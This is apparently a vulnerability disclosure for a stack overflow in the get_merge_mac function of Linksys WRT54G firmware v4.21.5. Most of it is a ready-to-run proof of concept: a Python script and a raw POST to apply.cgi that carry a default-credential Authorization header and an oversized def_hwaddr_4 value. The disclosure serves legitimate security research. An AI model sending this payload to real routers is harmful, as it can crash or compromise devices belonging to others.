Product overview https://store.linksys.com/support-product?sku=WRT54G
Linksys WRT54G Firmware v4.21.5
The Linksys WRT54G Firmware v4.21.5 has a stack overflow vulnerability in get_merge_mac function. The variable def_hwaddr_%d
receives the parameter from a POST request. In line 17, the stract function will merge it with the variable a2. It is important to note that in the calling function, the a2 variable is stack-allocated and has a size of only 24 characters. If the variable exceeds this length, it can result in a buffer overflow vulnerability, potentially leading to remote code execution or denial-of-service attacks.
import requests
url = 'http://192.168.1.1/apply.cgi'
headers = {
'Host': '192.168.1.1',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded',
'Origin': 'http://192.168.1.1',
'Authorization': 'Basic OmFkbWlu',
'Connection': 'close',
'Referer': 'http://192.168.1.1/WanMAC.asp',
'Upgrade-Insecure-Requests': '1',
'Priority': 'u=1',
}
payload = ('submit_button=WanMAC&change_action=&submit_type=&action=Apply&mac_clone_enable=1&def_hwaddr=6&'
'def_hwaddr_0=1C&def_hwaddr_1=0F&def_hwaddr_2=66&def_hwaddr_3=0A&'
'def_hwaddr_4=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&'
'def_hwaddr_5=E3')
response = requests.post(url, headers=headers, data=payload)
print('Status:', response.status_code)
print('Response:', response.text)
POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 197
Origin: http://192.168.1.1
Authorization: Basic OmFkbWlu
Connection: close
Referer: http://192.168.1.1/WanMAC.asp
Upgrade-Insecure-Requests: 1
Priority: u=1
submit_button=WanMAC&change_action=&submit_type=&action=Apply&mac_clone_enable=1&def_hwaddr=6&def_hwaddr_0=1C&def_hwaddr_1=0F&def_hwaddr_2=66&def_hwaddr_3=0A&def_hwaddr_4=111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111&def_hwaddr_5=E3